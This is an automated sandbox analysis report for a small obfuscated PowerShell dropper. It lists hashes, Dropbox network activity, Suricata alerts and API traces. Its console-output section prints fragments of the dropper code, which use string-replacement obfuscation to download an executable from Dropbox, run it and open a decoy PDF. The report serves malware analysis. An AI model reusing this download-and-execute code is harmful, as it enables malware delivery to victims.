Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 5, 2023, 5:15 p.m.	July 5, 2023, 5:17 p.m.

Size	840.0B
Type	ASCII text, with very long lines, with no line terminators
MD5	`a63dad914bebe79580df3eec4f58aef6`
SHA256	`5d9ae35c180d183d02e78cca1622618d35a5174e0fa6d0035b4b137ab83477dc`
CRC32	`515E2148`
ssdeep	`24:XpsiLY1WILAPLA9ojvobtTWblWAa6HtTWyD:rbILp9oro4r`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\fa3333.txt.ps1
3028
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\vi595e.bat'"
  2224

Name	Response	Post-Analysis Lookup
dl.dropboxusercontent.com	CNAME edge-block-www-env.dropbox-dns.com A 162.125.84.15	162.125.84.15

IP Address	Status	Action
162.125.84.15	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49167 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49167 -> 162.125.84.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49166 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49167 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49169 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49169 -> 162.125.84.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49169 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49170 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49166 -> 162.125.84.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49170 -> 162.125.84.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49170 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49166 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49169 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49166 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49167 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49170 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 5, 2023, 5:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 5, 2023, 5:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 5, 2023, 5:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 5, 2023, 5:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 5, 2023, 5:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 5, 2023, 5:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 5, 2023, 5:15 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 5, 2023, 5:15 p.m.			0	0

Command line console output was observed (50 out of 56 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti console_handle: 0x00000023	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: on was closed: An unexpected error occurred on a send." console_handle: 0x0000002f	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: At line:1 char:47 console_handle: 0x0000003b	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: + (New-Object System.Net.WebClient).DownloadFile <<<< ($oulv.Replace('nz8r','tp console_handle: 0x00000047	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: s://').Replace('jo6', 'e'), $fz) console_handle: 0x00000053	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x0000005f	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x0000006b	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: Start-Process : This command cannot be executed due to the error: The system ca console_handle: 0x0000001f	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: nnot find the file specified. console_handle: 0x0000002b	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: At line:1 char:6 console_handle: 0x00000037	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: + start <<<< $fz console_handle: 0x00000043	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [Start-Process], InvalidOp console_handle: 0x0000004f	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: erationException console_handle: 0x0000005b	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.C console_handle: 0x00000067	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: ommands.StartProcessCommand console_handle: 0x00000073	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: Remove-Item : Cannot remove the item at 'C:\Users\test22\AppData\Local\Temp\' b console_handle: 0x00000093	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: ecause it is in use. console_handle: 0x0000009f	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\fa3333.txt.ps1:1 char:662 console_handle: 0x000000ab	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: + powershell -win hidden $o3nj6v=iex($('[Environment]::GetEclvt'''.Replace('clv console_handle: 0x000000b7	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: ','nvironmentVariable(''public'') + ''\\vi595e.ba')));$flol=iex($('[Environment console_handle: 0x000000c3	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: ]::GetEclvt'''.Replace('clv','nvironmentVariable(''public'') + ''\\ec4h.ba'))); console_handle: 0x000000cf	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: function getit([string]$fz, [string]$oulv){$ff=iex($('(Nwwxqw-Objwwxqct Systwwx console_handle: 0x000000db	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: qm.Nwwxqt.WwwxqbCliwwxqnt).Downghzue($oulv.Replace(''nz8r'',''tps://'').Replace console_handle: 0x000000e7	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: (''jo6'', ''e''), $fz)').Replace('wwxq', 'e').Replace('ghzu', 'loadFil'));iex(' console_handle: 0x000000f3	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: ss4o6yars4o6y $fz'.Replace('s4o6y','t'))};getit -fz $flol -oulv 'htnz8rdl.dropb console_handle: 0x000000ff	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: oxusjo6rcontjo6nt.com/s/17td4mgoifvv8fh/FA002.jo6xjo6?dl=0';$fzf=$(Get-Location console_handle: 0x0000010b	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: ).tostring() + '\\';Remove-Item <<<< -Path ($fzf + $(Get-ChildItem -Include *. console_handle: 0x00000117	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: lnk -Name));getit -fz ($fzf + 'DKM029887273.pdf') -oulv 'htnz8rdl.dropboxusjo6r console_handle: 0x00000123	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: contjo6nt.com/s/vafxlh1jo6s0wunpm/730627926.pdf?dl=0';exit console_handle: 0x0000012f	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [Remove-Item], PSInvalidOp console_handle: 0x0000013b	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: erationException console_handle: 0x00000147	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: + FullyQualifiedErrorId : InvalidOperation,Microsoft.PowerShell.Commands.R console_handle: 0x00000153	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: emoveItemCommand console_handle: 0x0000015f	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti console_handle: 0x0000017f	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: on was closed: An unexpected error occurred on a send." console_handle: 0x0000018b	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: At line:1 char:47 console_handle: 0x00000197	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: + (New-Object System.Net.WebClient).DownloadFile <<<< ($oulv.Replace('nz8r','tp console_handle: 0x000001a3	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: s://').Replace('jo6', 'e'), $fz) console_handle: 0x000001af	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000001bb	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000001c7	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: Start-Process : This command cannot be executed due to the error: The system ca console_handle: 0x000001e7	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: nnot find the file specified. console_handle: 0x000001f3	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: At line:1 char:6 console_handle: 0x000001ff	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: + start <<<< $fz console_handle: 0x0000020b	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [Start-Process], InvalidOp console_handle: 0x00000217	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: erationException console_handle: 0x00000223	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.C console_handle: 0x0000022f	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: ommands.StartProcessCommand console_handle: 0x0000023b	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: The term '=iex' is not recognized as the name of a cmdlet, function, script fil console_handle: 0x00000023	1	1
WriteConsoleW July 5, 2023, 5:15 p.m.	buffer: e, or operable program. Check the spelling of the name, or if a path was includ console_handle: 0x0000002f	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 61 events)

Time & API	Arguments	Status	Return
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06521628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06521628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06521628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06521628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06521628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06521628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06521628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06521628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06521628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06521628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06521628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06521628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06521628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06521628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06521628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ecc40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed2c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed2c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed2c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ecd80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ecd80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ecd80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ecd80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ecd80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ecd80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ecd40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ecd40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ecd40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ec7c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ec7c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ec7c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ec7c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ec7c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ec7c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ec7c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ec7c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ec7c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ec7c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 5, 2023, 5:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ec7c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 5, 2023, 5:15 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 174 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0223b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0224f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02219000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05610000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05611000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05620000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02249000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 262144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 69632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063cb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05612000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 5, 2023, 5:15 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05613000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
